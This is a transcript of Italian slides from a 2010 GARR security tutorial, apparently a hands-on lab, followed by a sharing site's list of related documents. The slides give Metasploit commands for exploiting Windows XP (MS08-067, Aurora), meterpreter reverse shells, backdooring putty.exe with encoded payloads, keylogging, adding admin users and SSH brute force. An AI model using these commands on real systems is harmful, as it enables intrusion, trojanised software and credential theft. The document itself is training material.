1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, /11/2010
|
|
- Romolo Puglisi
- 8 anni fa
- Visualizzazioni
Transcript
1 1 GARR Tutorial sulla sicurezza informatica R. Cecchini e O. Pinazza Roma, /11/2010
2 Programma della giornata novembre a parte: vulnerabilità e backdoor in MS Windows Pausa pranzo 2 a parte: analisi forense di un sistema compromesso (con pausa caffè)
3 Introduzione Preparazione del laboratorio del mattino VM player BackTrack4 R1 virtual machine Windows XP virtual machine Metasploitable (?) C è un HD o DVD con il materiale per chi non ce l ha
4 MS Windows XP la versione distribuita èsp2, senza servizi vulnerabili aggiuntivi, con Internet Explorer 6 impostare le risorse hardware con il VM player secondo le caratteristiche del pc portatile controllare la configurazione
5 BackTrack èuna distribuzione linux basata su Ubuntu èuna collezione di software per la sicurezza versione live DVD e VM user/pass = root/toor rete: edit /etc/networking/interfaces /etc/init.d/network start/stop X Metasploit
6 Cominciamo con BackTrack Lanciamo il VM player e selezioniamo BT4 R1 Configuriamo le risorse secondo le disponibilità dell host Lanciamo la VM in modalità NAT Login: root/toor Configurazione di rete: Editare: /etc/network/interfaces Lanciare: /etc/init.d/networking start startx
7 Familiarizzamo con BackTrack
8 Metasploit Progetto opensource, che raccoglie 600 exploits 300 moduli ausiliari 200 payloads ècostituito da un framework un interfaccia grafica un database
9 Definizioni Threat (minaccia) = agente o attore che può causare danno Vulnerabilità = difetto che può essere sfruttato per causare danno Rischio = minaccia + vulnerabilità Exploit (da sfruttare) = codice o tecnica che sfrutta una vulnerabilità Payload = carico trasportato da strumenti di compromissione del sistema (Wikipedia) Shellcode = programma in linguaggio assembly che esegue una shell
10 Primo test Sfruttiamo la vulnerabilità MS mspx Vulnerabilità nel servizio SERVER, consente l esecuzione di codice in modalità remota semplicemente ricevendo una particolare richiesta RPC (porta 445) con il firewall ON con il firewall OFF shell di Windows Exploit: use ms08_067_netapi info show options Payload: show payloads set payload windows/shell/bind_tcp
11 comando exploit: esegue il codice che sfrutta la vulnerabilità invia il payload contenente un shellcode che apre la porta TCP 4444 sulla vittima e permette di aprire una shell con il comando help si possono vedere tutti i comandi possibili: ipconfig, dir, at, exploit (!)
12 Secondo test Aurora: vulnerabilità di Internet Explorer
13 Tutti i comandi L exploit di Metasploit funziona solo con IE 6 Msfconsole> search aurora use exploit windows/browser/ms10_002_aurora info show options set SRVHOST (mio_ip) set URIPATH /index.html show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST (mio ip) exploit
14 Meterpreter = metasploit interpreter Internet Explorer non mostra alcuna pagina web e tende a bloccarsi Entriamo nella sessione: sessions l session I N (numero della sessione) help ps migrate (numero di un processo più stabile) shell, background getuid (getprivs/getsystem), sysinfo, upload, download screenshot execute f notepad.exe teniamo aperto meterpreter per la prossima prova!
15 Terzo test: backdoor scarichiamo un eseguibile per Windows (es. putty.exe)./msfpayload windows/meterpreter/reverse_tcp LHOST= R./msfencode t exe x /root/putty.exe k o /tmp/putty2.exe e x86/shikata_ga_nai c 5 dalla sessione meterpreter: upload //tmp//putty2.exe c:\\documents\ and\ Settings\\Administrator\\Desktop\\putty2.exe background set exploit/multi/handler set payload windows/download_exec set payload windows/meterpreter/reverse_tcp show options set LHOST (mio ip) set LPORT (una porta diversa dal precedente, ancora attivo) Exploit Su windows, eseguiamo il putty.exe Provare meterpreter>keyscan_start / keyscan_dump / keyscan_stop
16 Creiamo un utente e abilitiamo RDP use incognito add_user nome password add_localgroup_user administrators nome run_getgui e Altre prove: use auxiliary/server/browser_autopwn
17 Se resta tempo proviamo metasploitable (Ubuntu) msf> nmap n sp xxx.1/24 msf> nmap n sv xxx.yyy (Metasploitable) search ssh use scanner/ssh/ssh_login Show options Set PASS FILE /pentest/passwords/wordlist/
18
Bucare WindowsXP SP2 con Metasploit
Bucare WindowsXP SP2 con Metasploit Vulnerabilità ms08_067_netapi Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più sicuro, vista l'introduzione di numerosi bugfix
DettagliRootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab
Pattern Recognition and Applications Lab Rootkit Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University
DettagliAXWIN6 QUICK INSTALL v.3.0
AXWIN6 QUICK INSTALL v.3.0 Procedura per l installazione di AxWin6 AxWin6 è un software basato su database Microsoft SQL Server 2008 R2. Il software è composto da AxCom: motore di comunicazione AxWin6
DettagliIndicazioni per una corretta configurazione del browser
SDS Scarico informazioni di dettaglio Basi Dati Sanità Versione 1.0.0 Indicazioni per una corretta configurazione del browser Versione novembre 2012 SDS-ConfigurazioniBrowser_v02 Pag. 1 di 27 Uso: ESTERNO
DettagliHacker Frameworks & Risorse utili HACKER FRAMEWORKS
Hacker Frameworks & Risorse utili HACKER FRAMEWORKS In questo modulo vedremo sia i software framework più utilizzati in ambito di penetration testing sia le risorse, come ad esempio siti internet dedicati,
DettagliCome Installare SQL Server 2008 R2 Express Edition With Tools
Come Installare SQL Server 2008 R2 Express Edition With Tools Circolare CT-1010-0087, del 28/10/2010. Come Installare SQL Server 2008 R2 Express Edition sul server... 2 Introduzione... 2 Installazione
DettagliPenetration Testing Aziendale con BeEF
Penetration Testing Aziendale con BeEF Giovanni Cattani Giovanni Cattani Security Specialist @ Secure Network S.r.l. #penetrationtest #vulnerabilityassessment #web #mobile #network #riskassessment BeEF
DettagliTeleassistenza mediante PCHelpware
Teleassistenza mediante PCHelpware Specifiche tecniche Autore: G.Rondelli Versione: 1.3 Data: 26/8/2008 File: H:\Softech\Tools\PCH\doc\Teleassistenza PCHelpware - Specifiche tecniche 1.3.doc Modifiche
DettagliNota Tecnica UBIQUITY 5 TN0019. Il documento descrive le novità introdotte con la versione 5 della piattaforma software ASEM Ubiquity.
UBIQUITY 5 Introduzione Il documento descrive le novità introdotte con la versione 5 della piattaforma software ASEM Ubiquity. Versione Descrizione Data 1 Prima emissione 20/01/2015 Disclaimer Le informazioni
DettagliConfigurazione del servizio Dynamic DNS. Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio.
Configurazione del servizio Dynamic DNS Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio. La prima operazione da svolgere consiste nella registrazione al sito:
DettagliSetup dell ambiente virtuale
Setup dell ambiente virtuale 1.1 L immagine per le macchine virtuali Il file mininet-vm-x86 64.qcow è l immagine di una memoria di massa su cui è installato un sistema Linux 3.13 Ubuntu 14.04.1 LTS SMP
DettagliInstallazione di GFI LANguard Network Security Scanner
Installazione di GFI LANguard Network Security Scanner Requisiti di sistema Installare GFI LANguard Network Security Scanner su un computer in possesso dei seguenti requisiti: Sistemi operativi Windows
DettagliOpenVAS - Open Source Vulnerability Scanner
OpenVAS - Open Source Vulnerability Scanner di Maurizio Pagani Introduzione OpenVAS è un framework che include servizi e tool per la scansione e la gestione completa delle vulnerabilità. Un vulnerability
DettagliIndice generale. Introduzione...xiii. Perché la virtualizzazione...1. Virtualizzazione del desktop: VirtualBox e Player...27
Indice generale Introduzione...xiii A chi è destinato questo libro... xiii Struttura del libro...xiv Capitolo 1 Capitolo 2 Perché la virtualizzazione...1 Il sistema operativo... 1 Caratteristiche generali
DettagliIndicazioni per una corretta configurazione del browser
MOBS Sistema di interscambio dati MOBilità Sanitaria Versione 1.0.0 Indicazioni per una corretta configurazione del browser Versione dicembre 2012 MBS MUT-01-V02_ConfigurazioneBrowser Pag. 1 di 25 Uso:
DettagliInstallazione di GFI WebMonitor
Installazione di GFI WebMonitor Requisiti di sistema di GFI WebMonitor Server Microsoft Windows 2000 (SP 3) o 2003. Microsoft ISA 2000 Server (non in modalità solo firewall) OPPURE Server Microsoft ISA
DettagliGUIDA ALL INSTALLAZIONE. Protezione di locale/rete. per il software CADPak su client e server di rete. per la Chiave Hardware Sentinel Hasp
GUIDA ALL INSTALLAZIONE Protezione di locale/rete per il software CADPak su client e server di rete per la Chiave Hardware Sentinel Hasp Windows 8/7/Xp e Windows Server Versione 1.00 23/04/2015, 1.10 09/06/2015
DettagliZeroshell: VPN Host-to-Lan. Il sistema operativo multifunzionale. creato da Fulvio.Ricciardi@zeroshell.net. www.zeroshell.net
Zeroshell: VPN Host-to-Lan Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Assicurare la comunicazione fra un host ed una rete ( Autore: cristiancolombini@libero.it
DettagliISTRUZIONI PER IL COLLEGAMENTO AL SERVER MATLAB DALL'ESTERNO DEL DIPARTIMENTO
ISTRUZIONI PER IL COLLEGAMENTO AL SERVER MATLAB DALL'ESTERNO DEL DIPARTIMENTO Il DII (sede G) condivide col DEI uno stock di licenze di rete per MATLAB e per una serie di Toolbox. Le licenze sono gestite
DettagliVirtualizzazione VirtualBox 4.1.2 su Host Windows
Virtualizzazione VirtualBox 4.1.2 su Host Windows La virtualizzazione, quando riferita all informatica, consiste nella creazione di una versione virtuale di una risorsa normalmente fornita fisicamente.
DettagliKroll Ontrack Servizi RDR Guida rapida
Kroll Ontrack Servizi RDR Guida rapida Selezionare una macchina Windows che sia in grado di funzionare come client remoto. É possibile utilizzare Windows XP e versioni successive ad eccezione di Windows
DettagliManuale d installazione C2Web Gestione studio
C2Web S.r.l. Manuale d installazione C2Web Gestione studio C2Web S.r.l. Sede legale V. Miani 5 27100 Pavia Ufficio St. Savonesa 9 Rivalta Scrivia Tortona (AL) Tel 0131-866748 Fax 0131-880763 e-mail info@c2web.net
DettagliDipartimento di Scienze Applicate
DIPARTIMENTO DI SCIENZE APPLICATE Università degli Studi di Napoli Parthenope Centro Direzionale di Napoli Isola C4 80143 Napoli dsa@uniparthenope.it P. IVA 01877320638 Dipartimento di Scienze Applicate.
DettagliServizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti
20120300 INDICE 1. Introduzione... 3 2. Consultazione... 4 2.1 Consultazione Server Fidati... 4 2.2 Consultazione Servizi Client... 5 2.3 Consultazione Stato richieste... 5 3. Amministrazione... 6 3.1
DettagliIngEstate. Sistema di telegestione
IngEstate Sistema di telegestione Indice 1. Introduzione generale del prodotto > I vantaggi per gli utenti 2. Caratteristiche tecniche > Tipologie di terminali gestiti > Caratteristiche tecniche > Le versioni
DettagliVirtualizzazione VirtualBox 4.1.2 su Host Linux
Virtualizzazione VirtualBox 4.1.2 su Host Linux In questo tutotial vedremo come installare Virtualbox su un host Linux (Ubuntu 11.04 Natty Narwhal) e come configurare una macchina virtuale Windows XP.
DettagliDigital Persona Client/Server
Documentazione Tecnica Digital Persona Client/Server Installazione 03/10/2012 INDICE DOCUMENTO Introduzione... 3 Versioni del documento... 3 Premessa... 3 Digital Persona... 3 Prerequisiti... 3 Installazione...
DettagliOperazioni da eseguire su tutti i computer
Preparazione Computer per l utilizzo in Server Farm SEAC Reperibilità Software necessario per la configurazione del computer... 2 Verifica prerequisiti... 3 Rimozione vecchie versioni software...4 Operazioni
DettagliIBM SPSS Statistics per Windows - Istruzioni di installazione (Licenza per utenti singoli)
IBM SPSS Statistics per Windows - Istruzioni di installazione (Licenza per utenti singoli) Le seguenti istruzioni sono relative all installazione di IBM SPSS Statistics versione 19 con licenza per utenti
DettagliCorso reti 2k7. linuxludus
Corso reti 2k7 linuxludus Lezione 1, introduzione al corso Giuseppe Marocchio (LAN) io@giuseppe-marocchio.com whoami Giuseppe Marocchio, Studente @ univr (Sci informatiche ), lavora presso un (w)isp, si
Dettagli01/05/2013 Istruzioni per l installazione
01/05/2013 Istruzioni per l installazione Il documento descrive le procedure rivolte a utenti esperti per l installazione del codice di ABCD SW su una macchina fisica che abbia funzioni di Server. Progetto
DettagliATLAS 2.X IL MANAGER NON SI AVVIA
ATLAS 2.X IL MANAGER NON SI AVVIA Avvio di Atlas 2.x sul server CONTESTO La macchina deve rispecchiare le seguenti caratteristiche MINIME di sistema: Valori MINIMI per Server di TC con 10 postazioni d'esame
Dettagli2010 Ing. Punzenberger COPA-DATA Srl. Tutti i diritti riservati.
2010 Ing. Punzenberger COPA-DATA Srl Tutti i diritti riservati. Tutti i diritti riservati la distribuzione e la copia - indifferentemente dal metodo - può essere consentita esclusivamente dalla dittacopa-data.
DettagliMultisentry ASE-V (v. 1.0) - Guida rapida all installazione
Multisentry ASE-V (v. 1.0) - Guida rapida all installazione 2012 Multisentry Solutions S.r.l. 1 di 15 Sommario 1 Multisentry ASE-V... 3 2 A chi è rivolto il manuale... 3 3 Prerequisiti... 3 3.1 VMware...
DettagliVADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7
VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe
DettagliNAL DI STAGING. Versione 1.0
NAL DI STAGING Versione 1.0 14/10/2008 Indice dei Contenuti 1. Introduzione... 3 2. Installazione NAL di staging... 3 VMWare Server... 3 Preistallazione su server linux... 6 Preinstallazione su server
DettagliGUIDA AL FUNZIONAMENTO DEL PROGRAMMA "UDVPANEL" PER PC
GUIDA AL FUNZIONAMENTO DEL PROGRAMMA "UDVPANEL" PER PC Questa guida presenta la configurazione e le indicazioni di funzionamento principali relative al programma "UDVPanel" necessario per ricevere su PC
DettagliGUIDA RAPIDA CONFIGURAZIONE RETE DDNS - INTERNET
Pag. 33 e seguenti GUIDA RAPIDA CONFIGURAZIONE RETE DDNS - INTERNET Nota importante, se si eseguono modifiche alle impostazioni di rete, per renderle operative è necessario premere il pulsante Play, oppure
DettagliAggiornamenti Sistema Addendum per l utente
Aggiornamenti Sistema Addendum per l utente Aggiornamenti Sistema è un servizio del server di stampa che consente di tenere il software di sistema sul proprio server di stampa sempre aggiornato con gli
DettagliEsercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli)
Sommario Esercitazione 05 Angelo Di Iorio (Paolo Marinelli)! Packet Filtering ICMP! Descrizione esercitazione! Applicazioni utili: " Firewall: wipfw - netfilter " Packet sniffer: wireshark!"#!$#!%&'$(%)*+,')#$-!"#!$#!%&'$(%)*+,')#$-
DettagliFAQ TeamPortal - DVD DEMO
FAQ - - 1 D: Sto utilizzando installato sulla macchina virtuale inclusa nel. Vorrei fare prove di configurazione e utilizzo dei Servizi Remoti di tipo RDPT per l esecuzione di Gamma Enterprise e Legal
DettagliDa Windows a Linux: È tempo di migrare! Nicola Corti Linux Day 2010 - Pisa
Da Windows a Linux: È tempo di migrare! Nicola Corti Linux Day 2010 - Pisa Cosa vuol dire Migrazione? Le migrazioni sono spostamenti che gli animali compiono in modo regolare, periodico (stagionale), lungo
DettagliNuovo server E-Shop: Guida alla installazione di Microsoft SQL Server
Nuovo server E-Shop: Guida alla installazione di Microsoft SQL Server La prima cosa da fare è installare SQL sul pc: se si vuole utilizzare SQL Server 2012 SP1 versione Express (gratuita), il link attuale
DettagliRepairsLab Manuale Utente. RepairsLab. Manuale Utente
Pag 1 di 14 RepairsLab Manuale Utente Per RepairsLab 1.0 Autore: Fabrizio Ferraiuolo Indice generale Introduzione...2 Installazione...2 Schermata principale...3 Configurazione...4 Configurazioni Base Dati...5
DettagliFileMaker Pro 13. Utilizzo di una Connessione Desktop Remota con FileMaker Pro13
FileMaker Pro 13 Utilizzo di una Connessione Desktop Remota con FileMaker Pro13 2007-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054
Dettagli1. Servizio di accesso remoto con SSL VPN
Indice documento 1. Servizio di accesso remoto con SSL VPN 1 a. A chi è rivolto 1 b. Come funziona 1 c. Piattaforme supportate 1 d. Come si accede (Windows, Mac OS X, Linux) 2-3 2. Competente WSAM attivo
DettagliCome installare e configurare il software FileZilla
Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti
DettagliGate Manager. 1 Come connettersi a un PLC S7-300/400 con Step7 installato su macchina virtuale. Table of Contents. your partner
1 Come connettersi a un PLC S7-300/400 con Step7 installato su macchina virtuale Table of Contents 1Indice...1 2Introduzione...2 3Cosa vi serve per cominciare...2 4Connessione via Ethernet con Step7 installato
DettagliGuida all Utilizzo dell Applicazione Centralino
Guida all Utilizzo dell Applicazione Centralino 1 Introduzione Indice Accesso all applicazione 3 Installazione di Vodafone Applicazione Centralino 3 Utilizzo dell Applicazione Centralino con accessi ad
DettagliManuale per la configurazione di AziendaSoft in rete
Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...
DettagliPTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato
La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato
DettagliServizio di accesso remoto con SSL VPN
Servizio di accesso remoto con SSL VPN A chi è rivolto A tutti, sia attuali clienti RUN che hanno un collegamento tra la loro intranet aziendale e RUN, sia futuri clienti che vogliono accedere alla loro
Dettagli2.1 Configurare il Firewall di Windows
.1 Configurare il Firewall di Windows LIBRERIA WEB Due o più computer possono scambiare dati, informazioni o servizi di tipo diverso utilizzando una connessione. Quindi, spesso, ad una connessione fisica
DettagliSISTEMA DI VIDEOCONFERENZA IFOAP
SISTEMA DI VIDEOCONFERENZA IFOAP MANUALE UTENTE Prerequisiti La piattaforma IFOAP è in grado di fornire un sistema di videoconferenza full active: uno strumento interattivo di comunicazione audio-video
DettagliCaratteristiche di una LAN
Installatore LAN Progetto per le classi V del corso di Informatica Caratteristiche di una LAN 26/02/08 Installatore LAN - Prof.Marco Marchisotti 1 Ruolo dei computer I computer di una rete possono svolgere
DettagliPHP, MySQL e Linux con RedHat 7.2
PHP, MySQL e Linux con RedHat 7.2 Loris Tissino copyright Loris Tissino, 2002 Table of Contents 1 Introduzione...1 1.1 Il necessario...1 2 Installazione e configurazione iniziale...2 2.1 Installazione
DettagliInstallazione di GFI Network Server Monitor
Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows
DettagliPiattaforma e- learning Corsi e- learning MANUALE UTENTE
Piattaforma e- learning Corsi e- learning MANUALE UTENTE Prerequisiti Attraverso la piattaforma i partecipanti possono fruire dei corsi e- learning. Per accedere ai corsi è sufficiente essere dotati di
DettagliSupporto On Line Allegato FAQ
Supporto On Line Allegato FAQ FAQ n.ro MAN-8NQLJY70768 Data ultima modifica 26/01/2012 Prodotto Dichiarazioni Fiscali 2012 Modulo Studi di Settore Oggetto Servizio di attivazione Studi WKI In giallo le
DettagliNetwork Monitoring. Introduzione all attività di Network Monitoring introduzione a Nagios come motore ideale
Network Monitoring & Introduzione all attività di Network Monitoring introduzione a Nagios come motore ideale Nicholas Pocher Poker SpA - Settimo Torinese, Novembre 2013 1 Indice Il Network Monitoring:
DettagliTecnologie Informatiche. security. Rete Aziendale Sicura
Tecnologie Informatiche security Rete Aziendale Sicura Neth Security è un sistema veloce, affidabile e potente per la gestione della sicurezza aziendale, la protezione della rete, l accesso a siti indesiderati
DettagliInstallazione di TeamLab su un server locale
Informazioni sulla versione server express di TeamLab La versione server express di TeamLab è una versione del portale progettata specialmente per quelli che hanno deciso di installare e configurare TeamLab
DettagliSipaMi.NET v. 3.1.0.0. Risoluzione problemi installazione
SipaMi.NET v. 3.1.0.0 Risoluzione problemi installazione FAQ: INSTALLAZIONE SQL 1.Cosa fare se non l installazione di SQL si blocca su componente Native Client? Andare su Pannello di controllo Programmi
DettagliReti di Telecomunicazione Lezione 7
Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione
DettagliFileMaker Pro 11. Esecuzione di FileMaker Pro 11 su Servizi Terminal
FileMaker Pro 11 Esecuzione di FileMaker Pro 11 su Servizi Terminal 2007 2010 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker
DettagliCorso di Informatica
Corso di Informatica Modulo L2 1.1-Introduzione 1 Prerequisiti Concetto intuitivo di applicazione per computer Uso pratico elementare di un sistema operativo 2 1 Introduzione Uno dei compiti di un sistema
DettagliGNUraghe. Desktop Virtualization +VirtualBox+...quando un solo pc non basta più... IL LUG DI ORISTANO. Virtualizzazione dei sistemi con VirtualBox
GNUraghe IL LUG DI ORISTANO Desktop Virtualization +VirtualBox+...quando un solo pc non basta più... 02 Frightned Virtualizzazione: what's this?? 03 Definizione Wikipedia: Per virtualizzazione si intende
DettagliCome accedere alle pubblicazioni da remoto con Windows
Come accedere alle pubblicazioni da remoto con Windows 1. Introduzione Molti utenti lamentano la difficoltà di accedere alle riviste scientifiche quando non si trovano in Dipartimento di Fisica, il problema
DettagliAvvio Servizi (per Chrome e Firefox)
FAQ TIS-Web www.dtco.it - www.extranetvdo.it Avvio Servizi (per Chrome e Firefox) Dalla versione 4.1, il servizio TIS-Web, è supportato anche da altri browser quali Google Chrome e Mozilla Firefox. Tuttavia,
DettagliTutorial KISSsoft: versione di prova e fasi iniziali
Tutorial KISSsoft 001: installazione e fasi iniziali KISSsoft AG - +41 55 254 20 50 Uetzikon 4 - +41 55 254 20 51 8634 Hombrechtikon - info@kisssoft.ag Svizzera - www.kisssoft.ag Tutorial KISSsoft: versione
DettagliConfiguration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1
Tutorial Configuration Managment Configurare il servizio EC2 su AWS Pagina 1 Sommario 1. INTRODUZIONE... 3 2. PROGRAMMI NECESSARI... 4 3. PANNELLO DI CONTROLLO... 5 4. CONFIGURARE E LANCIARE UN ISTANZA...
DettagliDW-SmartCluster (ver. 2.1) Test con macchine virtuali
DW-SmartCluster (ver. 2.1) Test con macchine virtuali Produttore Project Manager DataWare srl Ing. Stefano Carfagna Versione 1 Pag. 1 Indice Preparazione dell ambiente di test...3 Scenari di test...4 Precondizioni...4
DettagliDEFINIZIONI VM: abbreviazione di Virtual Machine (macchina virtuale).
DEFINIZIONI VM: abbreviazione di Virtual Machine (macchina virtuale). Ambiente autonomo composto da diversi dispositivi hardware, che per quanto emulati possono essere gestiti come se fossero reali. Host
DettagliGuida Connessione Rete WiFi HotSpot Internavigare
Guida Connessione Rete WiFi HotSpot Internavigare Indice: - 1.1 Configurazione Windows Xp 2.1 Configurazione Windows Vista 3.1 Configurazione Windows Seven 1.1 - WINDOWS XP Seguire i seguenti passi per
DettagliLa VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie
DettagliConfigurazione autenticazione 802.1x per le porte di rete nelle aule e nei laboratori del Dipartimento
Configurazione autenticazione 802.1x per le porte di rete nelle aule e nei laboratori del Dipartimento 1. Sistemi Microsoft Prerequisiti: Windows XP SP2 o Windows Vista Per i sistemi Windows XP SP2 verificare
DettagliCorso di Informatica
Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet
DettagliCARJAVA. Il software per gestire l accettazione. Da Tablet o Smartphone. Archivia i dati su PC e crea le commesse direttamente nel gestionale
CARJAVA Il software per gestire l accettazione Da Tablet o Smartphone Archivia i dati su PC e crea le commesse direttamente nel gestionale 1: Indice: Pag. 3 Principi Pag. 4 1- Lato pc 1.1 Download e installazione
DettagliGE Fanuc Automation. Page 1/12
GE FANUC Data Server FTP Server - Configurazione - Page 1/12 Revision History Version Date Author Notes 1.00 05-Jun-2002 M. Bianchi First release Summary 1 Introduzione... 3 1.1 Riferimenti... 3 2 Configurazione
DettagliIstruzioni di installazione di IBM SPSS Modeler Text Analytics (licenza per sito)
Istruzioni di installazione di IBM SPSS Modeler Text Analytics (licenza per sito) Le seguenti istruzioni sono relative all installazione di IBM SPSS Modeler Text Analytics versione 15 mediante un licenza
DettagliAltre misure di sicurezza
Altre misure di sicurezza Prevenzione dei danni e backup Ombretta Pinazza Altre misure di sicurezza Prevenzione dei danni e backup : Strumenti di protezione hardware Sistemi anti intrusione Backup: supporti
DettagliLa VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni
DettagliInternet ed i servizi di posta elettronica
Corso di introduzione all informatica Sommario Internet ed i servizi di posta elettronica Gaetano D Aquila La posta elettronica ed Outlook Express Sito internet del corso Prenotazione esami 2 Un po di
DettagliUn caso concreto di risposta ad un attacco hacker
Un caso concreto di risposta ad un attacco hacker http://escher07.altervista.org Premessa Questo documento è ottenuto come generalizzazione di un caso reale. Sono stati oscurati per ovvi motivi indirizzi
DettagliBackup Exec 2014 Management Pack for Microsoft SCOM. Manuale dell'utente di Management Pack for Microsoft SCOM
Backup Exec 2014 Management Pack for Microsoft SCOM Manuale dell'utente di Management Pack for Microsoft SCOM Management Pack for Microsoft Operations Il documento contiene i seguenti argomenti: Backup
Dettaglihttp://bcloud.brennercom.it/it/brennercom-b-cloud/applicazioni/26-0.html
b.backup Manuale Windows Questo manuale descrive le funzionalità di base del client b.backup illustra le operazioni necessarie per installare e attivare l applicazione, e spiega come eseguire un backup
DettagliAgent, porte, connettività e reti... 3. L agent di Kaseya utilizza la porta 5721 per comunicare con il server, ma che tipo di porta è?...
Kaseya Domande e Risposte Agent, porte, connettività e reti... 3 L agent di Kaseya utilizza la porta 5721 per comunicare con il server, ma che tipo di porta è?...3 Quanta memoria occupa l agent di Kaseya?...3
DettagliGuida rapida all installazione
www.dmail.it Idee Utili e Introvabili Cod. 314471 DMedia Commerce S.p.A. Via Aretina 25 50065 Sieci (FI) ITALY Tel. +39 055 8363040 Fax +39 055 8363057 Assist. Tecnica: assistenza.dmail@dmc.it VIdeoCAMera
DettagliFatti Raggiungere dal tuo Computer!!
Fatti Raggiungere dal tuo Computer!! Presentazione PcBridge è il modo rivoluzionario di accedere al proprio computer in qualsiasi momento e da qualsiasi luogo. Inserendo la penna usb OUT, Pcbridge permette
DettagliSommario. Modulo 8: Applicativi. Parte 3: Terminale remoto. Premessa Telnet SSH XWindows VNC RDP. Gennaio Marzo 2007
Modulo 8: Applicativi Parte 3: Terminale remoto 1 Sommario Premessa Telnet SSH XWindows VNC RDP Reti di Calcolatori 2 1 Premessa Necessita : controllare a distanza un dispositivo attraverso la connessione
DettagliNote sul tema IT METERING. Newits 2010
Note sul tema IT METERING IT Metering La telemetria è una tecnologia informatica che permette la misurazione e la trascrizione di informazioni di interesse al progettista di sistema o all'operatore. Come
DettagliACINT01. INTERFACCIA LAN PER CENTRALI ANTINCENDIO AC501 e AC502 ACINT01 REV.00-30/04/15 1
ACINT01 INTERFACCIA LAN PER CENTRALI ANTINCENDIO AC501 e AC502 ACINT01 REV.00-30/04/15 1 Sommario 1 Introduzione... 3 2 Collegamento della scheda sulle centrali AC502 e/o AC502... 3 3 Modifica dei parametri
DettagliPremessa Le indicazioni seguenti sono parzialmente tratte da Wikipedia (www.wikipedia.com) e da un tutorial di Pierlauro Sciarelli su comefare.
Macchine virtuali Premessa Le indicazioni seguenti sono parzialmente tratte da Wikipedia (www.wikipedia.com) e da un tutorial di Pierlauro Sciarelli su comefare.com 1. Cosa sono In informatica il termine
DettagliArea Sistemi Informativi. Ufficio Aule Didattiche ed ECDL. Progetto WiFi
Progetto WiFi PRESENTAZIONE UNIPV-WiFi consente agli utenti abilitati l accesso gratuito alla rete d Ateneo e a Internet tramite un qualunque dispositivo Wi-Fi nelle aree dell Università di Pavia coperte
DettagliISTRUZIONI PER L UTILIZZO DEL PORTALE E-LEARNING
ISTRUZIONI PER L UTILIZZO DEL PORTALE E-LEARNING INDICE - Configurazione computer 2 - Fase di login 3 - Accesso al corso 4 - Descrizione Home Page del Corso 5 - Fruizione dei moduli didattici 6 - Certificazione
DettagliStudi di Settore. Nota Operativa 22/4/2013
Nota Operativa Studi di Settore 22/4/2013 Sommario Valutazione casistiche... 2 Errore di connessione... 2 Sistema operativo non aggiornato... 2 File non installato client... 2 File non installato server...
DettagliBACKUP APPLIANCE. User guide Rev 1.0
BACKUP APPLIANCE User guide Rev 1.0 1.1 Connessione dell apparato... 2 1.2 Primo accesso all appliance... 2 1.3 Configurazione parametri di rete... 4 1.4 Configurazione Server di posta in uscita... 5 1.5
DettagliCome condividere l accesso internet tramite chiavetta HSPDA di 3 (o altro operatore) con un Ipod Touch via WIFI
Come condividere l accesso internet tramite chiavetta HSPDA di 3 (o altro operatore) con un Ipod Touch via WIFI Premessa Abbiamo un portatile dotato di WIFI che si collega ad internet tramite una chiavetta
DettagliTrend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione
Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione Anti-spyware Anti-spam Antivirus Anti-phishing Filtro di contenuti e URL Best practice, preparazioni e istruzioni
DettagliGFI LANguard 9. Guida introduttiva. A cura di GFI Software Ltd.
